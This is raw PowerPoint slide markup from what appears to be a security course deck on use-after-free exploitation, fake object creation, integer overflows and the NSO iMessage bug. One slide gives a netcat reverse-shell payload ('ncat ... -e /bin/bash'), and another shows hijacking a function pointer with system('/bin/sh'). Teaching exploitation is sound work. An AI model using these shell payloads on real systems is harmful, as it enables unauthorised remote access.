                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Ptr to command</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="15" name="Picture 14" descr="System as the function pointer.&#10;- https://man7.org/linux/man-pages/man3/system.3.html">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{EE8EE836-1949-2C46-A761-8C4E848CF56B}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill rotWithShape="1">
          <a:blip r:embed="rId5"/>
          <a:srcRect t="19746" b="36278"/>
          <a:stretch/>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="333275" y="3509566"/>
            <a:ext cx="8182075" cy="474602"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="19" name="Rectangle 18">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{F46B4ECD-7053-BF47-BA53-D57E6206846B}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="0" y="1891309"/>
            <a:ext cx="4282598" cy="7743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B14A0D4-734E-EA4E-8587-CE6EE4C5B22C}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="830065" y="2085202"/>
            <a:ext cx="2486572" cy="369332"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>system(“/bin/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>sh</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>”)</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="8" name="Picture 7">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{2AA2EC93-4747-E541-B6F9-3A41750FD457}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId6"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="0" y="4085262"/>
            <a:ext cx="9144000" cy="1058238"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="26" name="TextBox 25">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{03F97F80-D35E-C140-AF4E-D59F827CD3A9}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4317183" y="4585170"/>
            <a:ext cx="4785100" cy="369332"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>system(name)</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="23129722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D029-72AF-F544-9B74-483DFF756257}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit fontScale="90000"/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Fake Object Creation - Alignments</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="32" name="TextBox 31">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{B30A6EC6-E916-474C-95AC-28B483563A25}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="7761746" y="1497024"/>
            <a:ext cx="1743559" cy="369332"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>system</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="34" name="TextBox 33">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{5553C1BA-9891-5345-8950-9EA16B810F76}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="7188748" y="1120670"/>
            <a:ext cx="1743559" cy="369332"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Ptr to command</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="21" name="TextBox 20">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{FBF7916E-A6F6-3346-B097-36DD10C2BB13}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2775102" y="1301158"/>
            <a:ext cx="1518907" cy="646331"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Ptr to command</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="23" name="TextBox 22">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{7B14A0D4-734E-EA4E-8587-CE6EE4C5B22C}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2995334" y="1856907"/>
            <a:ext cx="1518907" cy="369332"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>system</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="26" name="TextBox 25">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{03F97F80-D35E-C140-AF4E-D59F827CD3A9}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4317183" y="4585170"/>
            <a:ext cx="4785100" cy="369332"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>system(name)</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="36" name="Picture 35" descr="System as the function pointer.&#10;- https://man7.org/linux/man-pages/man3/system.3.html">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{F3305F00-3640-0143-B9D8-4AED641571DE}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill rotWithShape="1">
          <a:blip r:embed="rId3"/>
          <a:srcRect t="19746" b="36278"/>
          <a:stretch/>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="16718" y="4585170"/>
            <a:ext cx="8995486" cy="521784"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="13" name="Picture 12" descr="Fake object with setup pointer">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{CDC7B42E-E64A-B94D-B232-7778D0471D48}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId4"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="714419" y="1268019"/>
            <a:ext cx="7800931" cy="3079315"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="68086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11649-6195-BC46-85D2-D74D4D946BC2}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Important Headers – 2 </a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Content Placeholder 2">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{DA902B4A-5F20-2547-95E5-062C01562C7A}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="229987" y="1124489"/>
            <a:ext cx="8684026" cy="3263504"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Authorization: Authentication information for a request</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Host: Host name and port number of the request being sent</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>X-Request-Id: Specifies the ID to use internally and on the response</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="4098" name="Picture 2">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{A449F6A5-CC2C-8E4B-B05F-29E7EC857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653293"/>
            <a:ext cx="6881859" cy="2255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861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78C8-1313-7642-A096-FBABFFD1AFE0}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="629841" y="342900"/>
            <a:ext cx="2949178" cy="1200150"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr anchor="b">
            <a:normAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>Netcat</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> Listener</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="5" name="Content Placeholder 4" descr="Text&#10;&#10;Description automatically generated">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{BDB2DCCA-C166-F9DE-D0D7-FDBCCCC6C19E}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvPicPr>
            <a:picLocks noGrp="1" noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvPicPr>
        <p:blipFill rotWithShape="1">
          <a:blip r:embed="rId2"/>
          <a:stretch/>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="4644004" y="740572"/>
            <a:ext cx="3115924" cy="3655219"/>
          </a:xfrm>
          <a:noFill/>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="10" name="Text Placeholder 3">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{B6A617BB-7EB6-18F1-5229-49CC47C315C7}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="body" sz="half" idx="2"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="195309" y="1543052"/>
            <a:ext cx="4304688" cy="2858691"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Listen on port 4444 for a connection</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>- Payload: </a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-US" dirty="0"/>
            </a:br>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0" err="1">
                <a:latin typeface="Hack" panose="020B0609030202020204" pitchFamily="49" charset="0"/>
                <a:ea typeface="Hack" panose="020B0609030202020204" pitchFamily="49" charset="0"/>
                <a:cs typeface="Hack" panose="020B0609030202020204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>ncat</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0">
                <a:latin typeface="Hack" panose="020B0609030202020204" pitchFamily="49" charset="0"/>
                <a:ea typeface="Hack" panose="020B0609030202020204" pitchFamily="49" charset="0"/>
                <a:cs typeface="Hack" panose="020B0609030202020204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t> 127.0.0.1 4444 -e /bin/bash</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="30611877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29C4-38E9-097C-9E65-0C35EED5911C}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="628650" y="273847"/>
            <a:ext cx="7886700" cy="994172"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr anchor="ctr">
            <a:normAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Demo</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Content Placeholder 2">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{3788A3E8-4069-25AB-3E57-DB3D4380FD06}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph sz="half" idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="628650" y="1369219"/>
            <a:ext cx="3886200" cy="3263504"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Triggering the UAF</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Overwriting object with our own</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Triggering the function pointer with system</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="2050" name="Picture 2" descr="3 Steps to a Winning Technical Demo - Think Listen Learn">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{97067F0E-85E8-5F77-07AD-B74C3AC2FE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9150" y="1763196"/>
            <a:ext cx="3886200" cy="2475550"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:solidFill>
            <a:srgbClr val="FFFFFF"/>
          </a:solidFill>
        </p:spPr>
      </p:pic>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="9417838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7567-2544-DD55-C19A-315C63781BF9}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="628650" y="273847"/>
            <a:ext cx="7886700" cy="994172"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr anchor="ctr">
            <a:normAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Bonus Round!</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="1026" name="Picture 2" descr="Why a Bonus Isn't as Good as a Raise (Even Though It Seems Awesome) |  Inc.com">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{BA430C68-8DE4-B23E-8C58-49E1F94EA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73" b="16834"/>
          <a:stretch/>
        </p:blipFill>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="628650" y="1236541"/>
            <a:ext cx="7886700" cy="3263504"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:solidFill>
            <a:srgbClr val="FFFFFF"/>
          </a:solidFill>
        </p:spPr>
      </p:pic>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="10466494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0F97-AA8E-DC46-2FF4-76BA4E5DD22B}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="628650" y="273847"/>
            <a:ext cx="7886700" cy="994172"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr anchor="ctr">
            <a:normAutofit fontScale="90000"/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="4100"/>
              <a:t>Number (Integer) Related Problems</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Content Placeholder 2">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{45B95AB5-1AEC-DF9C-5898-C51FEADBDAE4}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph sz="half" idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="628650" y="1369219"/>
            <a:ext cx="3886200" cy="3263504"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Maximum &amp; minimum sizes</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Wraps around to the other side</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Size extension/Truncation</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Signed vs. Unsigned</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="3074" name="Picture 2" descr="FORCEDENTRY and Integer Overflows – SD Solutions, LLC">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{0890E15B-B9AF-0879-9830-9627818087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3236" y="1029366"/>
            <a:ext cx="3886200" cy="2043389"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:solidFill>
            <a:srgbClr val="FFFFFF"/>
          </a:solidFill>
        </p:spPr>
      </p:pic>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="35346114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2094-2CE1-D9D2-4C2F-805FE1E607E3}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>NSO iMessage Vulnerability – 1 </a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Content Placeholder 2" descr="Adding all segments in a PDF together - https://googleprojectzero.blogspot.com/2021/12/a-deep-dive-into-nso-zero-click.html">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{D0076E60-A513-B424-F73A-1293263E612B}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Add size of all </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="1" i="1" dirty="0"/>
              <a:t>segments</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
